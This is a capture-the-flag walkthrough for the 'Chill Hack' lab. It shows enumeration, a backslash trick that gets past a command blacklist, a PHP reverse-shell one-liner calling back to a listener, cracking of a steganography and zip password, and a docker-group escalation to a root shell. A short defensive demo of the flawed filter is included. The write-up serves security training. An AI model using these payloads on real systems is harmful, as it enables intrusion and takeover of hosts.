Chill the Hack out of the Machine.
i) SCANNING
Let's start with an Nmap scan (-A turns on version detection, OS detection, default scripts and traceroute):
nmap -A <IP>

Start with FTP, which allows anonymous login.
There is a note in the share. It gives us two usernames: apaar and anurodh.

Next, the HTTP port.
It is a sports page with nothing useful on it, so run Gobuster against it to enumerate directories.

Nothing useful turns up except /secret.
It has a text field where we can enter a command to execute.

It filters the commands we type, so we need alternatives for the usual ones:
ls — echo *
cd — builtin cd
cat — tac
There is a .php file in this directory; read it with the cat alternative:
tac index.php
Its source contains the filter: a list of blacklisted command names that are rejected whenever they appear in the input.

There is a way around it. The filter only looks for the literal command name, so putting a backslash inside the name (p\hp instead of php) gets past the string match, and the shell strips the backslash before running the command.
On your machine, start a Netcat listener on port 1234 (the port used in the payload below).
Then submit this command in the form, replacing 10.0.0.1 with your listener's IP:
p\hp -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
fsockopen's socket lands on file descriptor 3, so the exec'd shell has its stdin, stdout and stderr pointed at the connection. We get a reverse shell.
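To make the bypass concrete, here is an added shell example (not from the room or the original writeup) that reproduces a naive substring blacklist of the kind /secret appears to use and shows why p\hp gets through while php does not. The blacklist words are constructed for the demo and are not the lab's exact list, and the substring-style check is an assumption based on the fact that the backslash trick works.

```shell
#!/bin/sh
# Added example: a naive command blacklist like the one behind /secret,
# and why a backslash inside the command name defeats it.

# Constructed blacklist for the demo; the lab's real list is different.
BLACKLIST="ls cd cat php nc"

# Return 0 (blocked) if any blacklisted word occurs anywhere in the command
# string. This mirrors a strpos()-style check: it matches literal substrings
# only and knows nothing about how the shell will later parse the string.
is_blocked() {
  cmd="$1"
  for word in $BLACKLIST; do
    case "$cmd" in
      *"$word"*) return 0 ;;
    esac
  done
  return 1
}

# Emulate the web form: refuse blacklisted input, otherwise hand the string
# to a shell exactly as shell_exec() would.
run_filtered() {
  if is_blocked "$1"; then
    echo "BLOCKED"
  else
    sh -c "$1"
  fi
}

# Show what the shell makes of a word after quote removal: the backslash in
# p\hp is removed, so the command that actually runs is php.
resolved() {
  eval "printf '%s\n' $1"
}

# Demo, mirroring the walkthrough's substitutions.
run_filtered 'ls'                         # BLOCKED
run_filtered 'echo *'                     # lists the directory instead
run_filtered 'cat /etc/hostname'          # BLOCKED
run_filtered 'printf "%s\n" one | c\at'   # prints "one": c\at passes the filter, runs as cat
resolved 'p\hp'                           # php
```

The lesson for the defender is the same one the lab teaches: a denylist of command names is not a sandbox. The filter compares strings, the shell compares tokens after quote removal, and any gap between the two parsers is a bypass. Whitelisting the exact commands the page needs, or not calling a shell at all, is the fix.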

Go to /var/www/files. There is a file with an unusual name; cat it.

It hints at the contents of the images directory.
Transfer both images to your machine with a Python web server. On the target:
python3 -m http.server 8000
On your machine:
wget http://10.10.10.10:8000/002d7e638fb463fb7a266f5ffc7ac47d.gif
wget http://10.10.10.10:8000/hacker-with-laptop_23-2147985341.jpg
Running steghide against either image asks for a passphrase. Use stegseek to brute-force it.
Nothing is found in the .gif, but from the .jpg stegseek extracts a .zip file, and unzipping it asks for a password.

Use John to crack the password:
zip2john hacker-with-laptop_23-2147985341.jpg.out > img.hash
john img.hash --wordlist=/usr/share/wordlists/rockyou.txt
The password is pass1word.

Now unzip the file.
Inside is a base64 string.

Decode it (base64 is an encoding, not encryption):
!d0ntKn0wmYp@ssw0rd

Try to log in via SSH with this password, using the usernames from the FTP note.

The account is a member of the docker group. That is effectively root: the Docker daemon runs as root, and any member can start a container with the host filesystem mounted inside it.

Run this command:
docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh
It mounts the host's / at /mnt inside an Alpine container and chroots into it, giving a root shell on the host filesystem.

user flag — /home/apaar/local.txt
root flag — /root/proof.txt
LAB SOLVED.